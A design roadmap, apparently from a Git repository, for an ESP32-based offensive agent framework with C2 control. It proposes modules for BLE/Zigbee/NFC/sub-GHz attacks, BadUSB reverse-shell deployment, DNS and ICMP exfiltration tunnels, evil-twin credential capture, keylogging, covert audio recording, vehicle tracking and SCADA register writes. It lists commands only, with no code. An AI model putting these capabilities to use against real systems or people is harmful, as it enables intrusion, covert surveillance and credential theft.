Eun0us/espilon-source
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
6d45770d98
espilon-source/MODULE_IDEAS.md

27 KiB
Raw Blame History

Espilon Module Ideas

Future module ideas for the Espilon agent framework, organized by category. Each entry includes hardware requirements, estimated cost, complexity (1-5), and key C2 commands.

Legend: Complexity 1 = simple wrapper, 5 = full protocol stack. Cost = additional hardware beyond ESP32.

Table of Contents

Radio & Wireless

mod_ble — Bluetooth Low Energy

Hardware: ESP32 built-in | Cost: 0 EUR | Complexity: 3/5

BLE scanning, GATT enumeration, beacon spoofing, and device tracking.

Commands:

  • ble_scan [duration] — Discover BLE devices (name, RSSI, services)
  • ble_enum <addr> — Enumerate GATT services and characteristics
  • ble_read <addr> <handle> — Read characteristic value
  • ble_write <addr> <handle> <hex> — Write to characteristic
  • ble_beacon <uuid> [major] [minor] — Spoof iBeacon/Eddystone
  • ble_track <addr> [duration] — Track device RSSI over time
  • ble_flood [count] — Broadcast random BLE advertisements

Use cases: IoT device recon, BLE lock testing, asset tracking, Bluetooth phishing.

mod_zigbee — IEEE 802.15.4 / Zigbee

Hardware: CC2530/CC2531 module via UART | Cost: ~4 EUR | Complexity: 4/5

Sniff, inject, and replay Zigbee/802.15.4 frames. Targets smart home (Philips Hue, SmartThings, Ikea).

Commands:

  • zigbee_scan [channel] — Discover Zigbee networks and devices
  • zigbee_sniff <channel> [duration] — Capture 802.15.4 frames
  • zigbee_inject <channel> <hex_frame> — Inject raw frame
  • zigbee_replay — Replay captured frames
  • zigbee_key_sniff [duration] — Capture transport key exchange
  • zigbee_jam <channel> — Channel jamming

Use cases: Smart home testing, IoT protocol analysis, Zigbee network penetration.

mod_nfc — RFID / NFC

Hardware: RC522 (MIFARE) or PN532 (full NFC) via SPI | Cost: ~3 EUR | Complexity: 3/5

Read, write, clone, and emulate RFID/NFC tags. Supports MIFARE Classic, NTAG, and ISO 14443.

Commands:

  • nfc_scan — Detect tags in range (UID, type, ATQA, SAK)
  • nfc_read <sector> [key] — Read MIFARE sector
  • nfc_write <sector> <hex> [key] — Write to sector
  • nfc_clone — Read tag → store → emulate (UID-level clone)
  • nfc_crack <sector> — MIFARE Classic key recovery (nested/hardnested)
  • nfc_dump — Dump full tag contents
  • nfc_emulate <uid> — Emulate tag UID

Use cases: Access card cloning, NFC payment research, badge system testing.

mod_subghz — Sub-GHz Radio (433/868/915 MHz)

Hardware: CC1101 module via SPI | Cost: ~3 EUR | Complexity: 4/5

Sniff, decode, record, and replay sub-GHz radio signals. Targets garage doors, remotes, weather stations, sensors.

Commands:

  • subghz_rx <freq_mhz> [modulation] — Listen on frequency (ASK/FSK/GFSK)
  • subghz_tx <freq_mhz> <hex_data> [repeat] — Transmit raw data
  • subghz_scan <start_mhz> <end_mhz> — Frequency scanner (find active freqs)
  • subghz_record <freq_mhz> [duration] — Record raw signal
  • subghz_replay [speed] — Replay recorded signal
  • subghz_decode <protocol> — Decode known protocols (Oregon, LaCrosse, etc.)
  • subghz_bruteforce <freq_mhz> <bits> [delay] — Brute-force fixed codes

Use cases: Garage door testing, remote control analysis, sensor spoofing, ISM band recon.

mod_lora — LoRa Long-Range Mesh

Hardware: SX1276/SX1278 module via SPI | Cost: ~5 EUR | Complexity: 3/5

LoRa-based backup C2 channel and mesh network for long-range, low-bandwidth communication.

Commands:

  • lora_start <freq_mhz> [sf] [bw] — Init LoRa radio (spreading factor, bandwidth)
  • lora_send <hex_data> — Send raw LoRa packet
  • lora_listen [duration] — Receive packets
  • lora_mesh_start — Enable mesh relay mode (multi-hop)
  • lora_c2_enable — Use LoRa as backup C2 channel
  • lora_range_test — Ping-pong range measurement

Use cases: Backup C2 (1-10 km range), field mesh network, exfiltration when WiFi unavailable.

mod_ir — Infrared TX/RX

Hardware: IR LED + IR receiver (VS1838B) | Cost: ~1 EUR | Complexity: 2/5

Capture, decode, and replay infrared remote signals. Universal remote functionality.

Commands:

  • ir_learn [timeout] — Record IR signal from any remote
  • ir_send <protocol> <code> — Send known protocol (NEC, Sony, RC5, Samsung)
  • ir_replay — Replay last captured signal
  • ir_scan — Brute-force common power codes (TV-B-Gone style)
  • ir_raw_send <timing_data> — Send raw pulse/space timing

Use cases: TV/AC control, IR protocol analysis, physical access (some locks use IR).

mod_espnow_swarm — Coordinated ESP-NOW Swarm

Hardware: Additional ESP32 agents | Cost: 0 EUR per agent | Complexity: 4/5

Coordinate multiple Espilon agents via ESP-NOW for distributed operations. Mesh-aware task distribution.

Commands:

  • swarm_discover — Find nearby Espilon agents
  • swarm_broadcast <command> — Send command to all agents
  • swarm_assign <agent_id> <command> — Targeted task assignment
  • swarm_sync — Synchronize clocks for coordinated actions
  • swarm_scan_distributed <target> — Parallel network scanning from multiple positions
  • swarm_relay <agent_id> — Use agent as relay for out-of-range C2

Use cases: Distributed WiFi scanning, coordinated deauth, coverage extension, multi-angle recon.

mod_tpms — Tire Pressure Monitoring

Hardware: CC1101 (315 or 433 MHz) | Cost: ~3 EUR | Complexity: 3/5

Sniff and spoof TPMS sensors at 315/433 MHz. Vehicle identification via unique sensor IDs.

Commands:

  • tpms_listen [duration] — Capture TPMS broadcasts
  • tpms_decode — Show decoded sensor data (pressure, temp, ID)
  • tpms_track <sensor_id> — Track specific vehicle presence
  • tpms_spoof <sensor_id> <pressure> <temp> — Inject fake reading

Use cases: Vehicle tracking via TPMS IDs, TPMS protocol research.

USB & HID

mod_badusb — USB HID Injection

Hardware: ESP32-S2 or ESP32-S3 (native USB) | Cost: 0 EUR | Complexity: 3/5

Keystroke injection attack via USB HID. Triggered remotely from C2.

Commands:

  • badusb_run <payload_name> — Execute named payload
  • badusb_type <text> — Type arbitrary text
  • badusb_key <combo> — Send key combo (e.g., WIN+R, CTRL+ALT+DEL)
  • badusb_delay <ms> — Wait between keystrokes
  • badusb_upload <script> — Upload Ducky Script payload
  • badusb_list — List stored payloads
  • badusb_os_detect — Detect target OS via timing analysis

Use cases: Physical access exploitation, credential harvesting, reverse shell deployment.

mod_rubber_ducky — Ducky Script Interpreter

Hardware: ESP32-S2/S3 | Cost: 0 EUR | Complexity: 2/5

Full Ducky Script interpreter for scripted USB HID payloads. Companion to mod_badusb.

Commands:

  • ducky_load <script> — Load script from NVS or C2
  • ducky_exec — Execute loaded script
  • ducky_store <name> <script> — Save payload to NVS
  • ducky_list — List stored scripts

mod_usb_mitm — USB Man-in-the-Middle

Hardware: ESP32-S3 (dual USB ports) | Cost: 0 EUR | Complexity: 5/5

Transparent USB proxy: sniff, modify, or inject traffic between host and device.

Commands:

  • usb_mitm_start — Start USB proxy
  • usb_mitm_sniff [class] — Log traffic (HID, mass storage, etc.)
  • usb_mitm_inject <hex> — Inject USB packets
  • usb_mitm_filter <rule> — Modify packets in transit

Use cases: USB protocol analysis, keyboard sniffing, mass storage interception.

Hardware Hacking

mod_jtag — JTAG/SWD Debug Interface

Hardware: GPIO wires (no extra module) | Cost: 0 EUR | Complexity: 4/5

Bit-bang JTAG/SWD for firmware extraction, debug access, and boundary scan on target devices.

Commands:

  • jtag_scan — Detect JTAG chain (IDCODE scan)
  • jtag_read <addr> <size> — Read memory via debug port
  • jtag_write <addr> <hex> — Write memory
  • jtag_dump <addr> <size> — Dump firmware to C2
  • swd_scan — Detect SWD target
  • swd_read <addr> <size> — Read via SWD
  • swd_halt / swd_resume — Halt/resume target CPU

Use cases: Firmware extraction from IoT devices, bypassing read-out protection, live debugging.

mod_uart_bridge — UART Sniff/Inject

Hardware: GPIO wires (no extra module) | Cost: 0 EUR | Complexity: 2/5

UART bridge: sniff serial console traffic or inject commands. Auto-detect baud rate.

Commands:

  • uart_scan [gpio] — Auto-detect baud rate on GPIO pin
  • uart_listen <baud> <rx_gpio> [duration] — Sniff UART traffic
  • uart_send <baud> <tx_gpio> <data> — Send data
  • uart_bridge <baud> <rx> <tx> — Bidirectional bridge (relay to C2)

Use cases: Router console access, IoT device debug ports, embedded system exploitation.

mod_i2c_scan — I2C Bus Discovery

Hardware: GPIO wires | Cost: 0 EUR | Complexity: 2/5

Scan, read, and write I2C devices. EEPROM dumping and sensor spoofing.

Commands:

  • i2c_scan [sda] [scl] — Discover devices on bus
  • i2c_read <addr> <reg> <len> — Read registers
  • i2c_write <addr> <reg> <hex> — Write registers
  • i2c_dump_eeprom <addr> <size> — Dump EEPROM contents

Use cases: EEPROM credential extraction, sensor data manipulation, I2C device enumeration.

mod_spi_flash — SPI Flash Dumper

Hardware: SOIC-8 clip + GPIO wires | Cost: ~5 EUR | Complexity: 3/5

Read/write SPI NOR flash chips (25xx series). In-circuit or off-board.

Commands:

  • spi_flash_detect — Read JEDEC ID, detect chip
  • spi_flash_read <addr> <size> — Read flash to C2
  • spi_flash_write <addr> <hex> — Write data
  • spi_flash_erase <addr> <size> — Erase sectors
  • spi_flash_dump — Full chip dump

Use cases: Firmware extraction, credential recovery, flash image modification.

mod_glitch — Voltage/Clock Glitching

Hardware: MOSFET + GPIO (voltage glitch) or clock inject circuit | Cost: ~5 EUR | Complexity: 5/5

Fault injection: precise voltage or clock glitches to bypass secure boot, skip instructions, or corrupt crypto.

Commands:

  • glitch_config <width_ns> <offset_ns> <repeat> — Set glitch parameters
  • glitch_arm <trigger_gpio> — Arm, fire on trigger edge
  • glitch_fire — Manual trigger
  • glitch_sweep <start_ns> <end_ns> <step> — Automated parameter sweep

Use cases: Secure boot bypass, read-out protection defeat, crypto fault injection.

Network & Protocols

mod_dns — DNS Spoofing & Tunneling

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

DNS server for spoofing + DNS tunnel for covert data exfiltration through firewalls.

Commands:

  • dns_spoof_start <domain> <ip> — Spoof specific domain resolution
  • dns_spoof_all <ip> — Redirect all DNS queries to IP
  • dns_spoof_stop — Stop spoofing
  • dns_tunnel_start <domain> — Start DNS tunnel (data over TXT/CNAME)
  • dns_tunnel_send <hex> — Exfiltrate data via DNS

Use cases: Pharming, captive portal bypass, firewall evasion, covert exfiltration.

mod_dhcp — DHCP Attacks

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

DHCP starvation and rogue DHCP server for MitM via gateway redirection.

Commands:

  • dhcp_starve [count] — Exhaust DHCP pool with fake MACs
  • dhcp_rogue_start <gateway_ip> <dns_ip> — Start rogue DHCP server
  • dhcp_rogue_stop — Stop rogue server
  • dhcp_discover — Passive DHCP monitoring

Use cases: MitM setup, network disruption, rogue gateway for traffic interception.

mod_mdns — mDNS/Bonjour Discovery

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Discover and spoof local services via mDNS (Bonjour, Avahi).

Commands:

  • mdns_scan [duration] — Discover all mDNS services
  • mdns_query <service> — Query specific service type (_http._tcp, _ssh._tcp, etc.)
  • mdns_spoof <hostname> <ip> — Spoof mDNS response
  • mdns_register <service> <port> — Advertise fake service

Use cases: Local service enumeration, service spoofing, printer/AirPlay impersonation.

mod_mqtt — MQTT Broker/Client

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

MQTT client for IoT device interaction + rogue broker for message interception.

Commands:

  • mqtt_connect <broker> [user] [pass] — Connect to broker
  • mqtt_sub <topic> — Subscribe and stream messages to C2
  • mqtt_pub <topic> <payload> — Publish message
  • mqtt_enum — Enumerate all topics (wildcard subscribe)
  • mqtt_broker_start [port] — Start rogue MQTT broker
  • mqtt_intercept <topic> — MitM specific topic

Use cases: IoT device control, smart home exploitation, message injection, credential sniffing.

mod_coap — CoAP Discovery & Exploitation

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

CoAP client for constrained IoT device interaction (UDP-based REST).

Commands:

  • coap_discover <ip> — Discover CoAP resources (.well-known/core)
  • coap_get <uri> — GET resource
  • coap_put <uri> <payload> — PUT resource
  • coap_observe <uri> — Subscribe to resource changes

Use cases: IoT device enumeration, sensor data extraction, actuator control.

mod_upnp — UPnP/SSDP Discovery

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Discover and interact with UPnP devices on the network. Map router port forwards.

Commands:

  • upnp_scan — Discover UPnP devices (SSDP M-SEARCH)
  • upnp_describe <url> — Get device description XML
  • upnp_port_map <ext_port> <int_ip> <int_port> — Add port mapping on router
  • upnp_port_list — List existing port mappings
  • upnp_port_del <ext_port> — Remove port mapping

Use cases: Router exploitation, port mapping for persistence, device enumeration.

mod_socks — SOCKS5 Proxy

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

Full SOCKS5 proxy running on the agent for network pivoting.

Commands:

  • socks_start [port] [auth] — Start SOCKS5 server
  • socks_stop — Stop proxy
  • socks_status — Active connections, bandwidth stats
  • socks_whitelist <ip> — Allow only specific clients

Use cases: Network pivoting, traffic routing through agent, accessing internal networks.

mod_wifi_rogue — Advanced Evil Twin

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 5/5

WPA2-Enterprise Evil Twin with EAP credential interception (EAP-TTLS, PEAP, MSCHAPv2).

Commands:

  • rogue_start <ssid> [eap_type] — Start evil twin with RADIUS
  • rogue_stop — Stop
  • rogue_creds — List captured credentials
  • rogue_deauth <bssid> <station> — Force client reconnection to rogue AP

Use cases: Enterprise WiFi credential harvesting, WPA2-Enterprise testing.

Industrial & SCADA

mod_modbus — Modbus TCP/RTU

Hardware: None (TCP) or MAX485 (~2 EUR for RTU) | Cost: 0-2 EUR | Complexity: 3/5

Modbus protocol for SCADA/ICS reconnaissance and interaction.

Commands:

  • modbus_scan <ip_range> — Discover Modbus TCP devices
  • modbus_read <ip> <unit> <addr> <count> [type] — Read holding/input registers
  • modbus_write <ip> <unit> <addr> <value> — Write register
  • modbus_coils <ip> <unit> <addr> <count> — Read/write coils
  • modbus_enum <ip> — Enumerate function codes and unit IDs
  • modbus_rtu_scan <baud> — Scan RTU bus (RS-485)

Use cases: SCADA assessment, PLC interaction, industrial network mapping.

mod_bacnet — Building Automation

Hardware: None (WiFi/Ethernet) | Cost: 0 EUR | Complexity: 4/5

BACnet protocol for building automation system interaction (HVAC, lighting, access).

Commands:

  • bacnet_discover — Who-Is broadcast, discover BACnet devices
  • bacnet_read <device> <object> <property> — Read property
  • bacnet_write <device> <object> <property> <value> — Write property
  • bacnet_enum <device> — Enumerate objects on device

Use cases: Building automation testing, HVAC control, access system research.

mod_ethernet — Wired Ethernet (W5500)

Hardware: W5500 or ENC28J60 SPI module | Cost: ~4 EUR | Complexity: 3/5

Wired Ethernet connectivity — bypass WiFi isolation, direct LAN access.

Commands:

  • eth_start [dhcp|static <ip>] — Init Ethernet interface
  • eth_status — Link state, IP config
  • eth_scan — ARP scan on wired LAN
  • eth_bridge — Bridge WiFi ↔ Ethernet traffic

Use cases: Drop box on wired network, bypass wireless ACLs, physical pentesting.

Exfiltration & Covert Channels

mod_dns_tunnel — C2 over DNS

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Full C2 communication over DNS queries/responses. Bypasses most firewalls.

Commands:

  • dns_c2_start <domain> <resolver> — Start DNS C2 channel
  • dns_c2_stop — Revert to TCP
  • dns_c2_status — Throughput, latency stats

Use cases: Firewall bypass, restricted network C2, exfiltration through corporate DNS.

mod_icmp_tunnel — C2 over ICMP

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 3/5

Backup C2 channel using ICMP echo request/reply payloads.

Commands:

  • icmp_c2_start <server_ip> — Start ICMP tunnel
  • icmp_c2_stop — Revert to TCP
  • icmp_exfil <hex_data> — One-shot data exfiltration

Use cases: C2 when TCP is blocked, ping-based covert channel.

mod_audio_exfil — Audio Capture

Hardware: INMP441 I2S MEMS microphone | Cost: ~3 EUR | Complexity: 4/5

Audio recording and optional ultrasonic covert channel for air-gapped data transfer.

Commands:

  • audio_record [duration] [quality] — Record audio, stream to C2
  • audio_level — Ambient noise level (trigger-based recording)
  • audio_vad_start — Voice Activity Detection — record only when speaking
  • audio_ultrasonic_tx <hex> — Transmit data via ultrasound (18-22 kHz)

Use cases: Environmental awareness, meeting capture, air-gap bridging.

mod_sdcard — SD Card Storage

Hardware: MicroSD module via SPI | Cost: ~2 EUR | Complexity: 2/5

Local offline storage for dead-drop operations, large data dumps, and logging.

Commands:

  • sd_init — Mount SD card
  • sd_write <filename> <data> — Write file
  • sd_read <filename> — Read and stream to C2
  • sd_list — List files
  • sd_log_start — Log all C2 traffic to SD
  • sd_space — Free/total space

Use cases: Offline data collection, dead-drop exfiltration, large firmware dumps.

Sensors & Environment

mod_gps — GPS/GNSS Tracking

Hardware: NEO-6M/NEO-7M via UART | Cost: ~5 EUR | Complexity: 2/5

GPS positioning, geofencing, and location-stamped events.

Commands:

  • gps_start — Begin GPS acquisition
  • gps_position — Current lat/lon/alt/speed
  • gps_track [interval] — Stream position to C2
  • gps_geofence <lat> <lon> <radius_m> <action> — Trigger action on enter/exit
  • gps_log_start — Log positions to NVS

Use cases: Asset tracking, geofenced triggers, location-aware operations.

mod_environment — Environmental Sensors

Hardware: DHT22/BME280/PIR/LDR | Cost: ~3 EUR | Complexity: 1/5

Read temperature, humidity, pressure, motion, and light sensors.

Commands:

  • env_read — Read all connected sensors
  • env_monitor [interval] — Stream readings to C2
  • env_motion_alert — Alert C2 on PIR trigger
  • env_trigger <sensor> <threshold> <action> — Conditional triggers

Use cases: Physical security awareness, environmental monitoring, trigger-based activation.

mod_power — Power Management

Hardware: TP4056 + LiPo battery | Cost: ~5 EUR | Complexity: 3/5

Battery management, intelligent deep sleep, and solar charging support.

Commands:

  • power_status — Battery voltage, charging state, estimated runtime
  • power_sleep <seconds> — Enter deep sleep with wake timer
  • power_sleep_until <gpio_trigger> — Sleep until GPIO event
  • power_profile <mode> — Power profiles (aggressive, balanced, stealth)
  • power_schedule <cron> <command> — Scheduled wake + command execution

Use cases: Long-duration deployment, battery-powered field operations, solar-powered persistent presence.

mod_display — OLED/TFT Display

Hardware: SSD1306 OLED (0.96") or ST7735 TFT via SPI/I2C | Cost: ~3 EUR | Complexity: 2/5

Local status display for field operations (no C2 needed to see agent state).

Commands:

  • display_text <text> — Show text on screen
  • display_status — Show device info, connection state, active module
  • display_qr <data> — Generate QR code on display
  • display_off — Turn off (stealth)

Use cases: Field status monitoring, debug output, one-way info display.

Crypto & WiFi Attacks

mod_deauth — 802.11 Deauthentication

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 2/5

Targeted 802.11 deauth for forcing client reconnection (handshake capture setup).

Commands:

  • deauth <bssid> <station> [count] — Targeted deauth
  • deauth_all <bssid> [count] — Broadcast deauth
  • deauth_continuous <bssid> [interval] — Persistent deauth

Use cases: WPA handshake capture setup, client denial, forced AP migration.

mod_wpa_crack — WPA Handshake Capture

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Capture 4-way handshake and attempt dictionary attack with embedded wordlist.

Commands:

  • wpa_capture <bssid> [channel] [timeout] — Wait for handshake (or deauth to force)
  • wpa_crack <bssid> [wordlist] — Dictionary attack on captured handshake
  • wpa_export <bssid> — Export handshake as pcap/hccapx to C2

Use cases: WiFi security assessment, credential recovery.

mod_pmkid — PMKID Attack

Hardware: None (WiFi) | Cost: 0 EUR | Complexity: 4/5

Capture PMKID from AP without any connected client. Faster than handshake capture.

Commands:

  • pmkid_scan [duration] — Scan APs and capture PMKIDs
  • pmkid_target <bssid> — Target specific AP
  • pmkid_export — Export PMKIDs for offline cracking

Use cases: WiFi testing without connected clients, faster WPA cracking.

mod_rfcrack — Rolling Code Analysis

Hardware: CC1101 via SPI | Cost: ~3 EUR | Complexity: 5/5

Analyze and attack rolling code systems (garages, car key fobs, gates).

Commands:

  • rfcrack_listen <freq> — Capture rolling code transmissions
  • rfcrack_analyze — Identify protocol (KeeLoq, etc.)
  • rfcrack_rolljam <freq> — RollJam attack (jam + capture + replay)
  • rfcrack_desync <freq> — De-synchronization attack

Use cases: Physical security research, rolling code protocol analysis.

Automotive

mod_lin_bus — LIN Bus

Hardware: MCP2004A LIN transceiver | Cost: ~3 EUR | Complexity: 3/5

LIN bus (Local Interconnect Network) — sub-bus used for windows, seats, mirrors, lights.

Commands:

  • lin_start [baud] — Init LIN transceiver (default 19200)
  • lin_sniff [duration] — Capture LIN frames
  • lin_send <id> <data_hex> — Send LIN frame
  • lin_master_start — Become LIN master (send schedule table)
  • lin_enum — Enumerate slave nodes

Use cases: Automotive body control testing, seat/window/mirror manipulation.

mod_obd_tracker — OBD-II GPS Tracker

Hardware: MCP2515 + NEO-6M GPS | Cost: ~8 EUR | Complexity: 3/5

Autonomous vehicle tracker: logs GPS position + OBD-II data, reports to C2 when connectivity available.

Commands:

  • tracker_start [interval] — Begin tracking (OBD + GPS)
  • tracker_stop — Stop and upload buffered data
  • tracker_status — Current position + vehicle stats
  • tracker_geofence <lat> <lon> <radius> — Alert on geofence breach
  • tracker_trips — Summarize recorded trips

Use cases: Vehicle tracking, fleet monitoring, trip analysis.

mod_flexray — FlexRay Bus

Hardware: FlexRay transceiver (TJA1080) | Cost: ~15 EUR | Complexity: 5/5

FlexRay monitoring for premium vehicles (BMW, Mercedes, Audi). Deterministic, time-triggered protocol.

Commands:

  • flexray_listen <channel> — Monitor FlexRay channel (A or B)
  • flexray_decode — Decode known frame IDs
  • flexray_status — Bus state, cycle time, slot info

Use cases: Premium vehicle bus analysis, FlexRay protocol research.

Physical Security

mod_keylogger — PS/2 Keyboard Logger

Hardware: PS/2 connector + GPIO wires | Cost: ~2 EUR | Complexity: 2/5

Hardware keylogger for PS/2 keyboards. Inline transparent interception.

Commands:

  • keylog_start — Begin capturing keystrokes
  • keylog_stop — Stop and send buffer to C2
  • keylog_dump — Send current buffer
  • keylog_live — Stream keystrokes in real-time to C2

Use cases: Physical access keystroke capture.

mod_relay — Relay Control

Hardware: Relay module (1/2/4 channel) | Cost: ~2 EUR | Complexity: 1/5

GPIO relay control for physical actuators (doors, power, devices).

Commands:

  • relay_on <channel> — Activate relay
  • relay_off <channel> — Deactivate relay
  • relay_pulse <channel> <duration_ms> — Momentary activation
  • relay_schedule <channel> <cron> — Scheduled activation

Use cases: Physical access control, remote power switching, automated triggers.

Priority Matrix

Modules ranked by impact/effort ratio for implementation priority:

Priority Module Why
High mod_ble Built-in hardware, zero cost, huge IoT attack surface
High mod_deauth Simple, essential for WiFi assessment workflows
High mod_badusb ESP32-S2/S3 native USB, high impact physical access
High mod_uart_bridge Zero cost, essential for hardware hacking
High mod_dns WiFi only, enables MitM and exfiltration
Medium mod_nfc Cheap hardware, wide applicability (access cards)
Medium mod_subghz CC1101 is cheap, covers huge attack surface
Medium mod_mqtt IoT everywhere, zero additional hardware
Medium mod_socks Pivoting capability, WiFi only
Medium mod_gps Cheap module, enables location-aware operations
Medium mod_modbus SCADA is a growing target, dual TCP/RTU
Medium mod_sdcard Simple, enables offline operations
Low mod_lora Good range but low throughput
Low mod_glitch High complexity, niche use case
Low mod_flexray Expensive hardware, niche vehicles
Low mod_usb_mitm Requires ESP32-S3 dual USB, very complex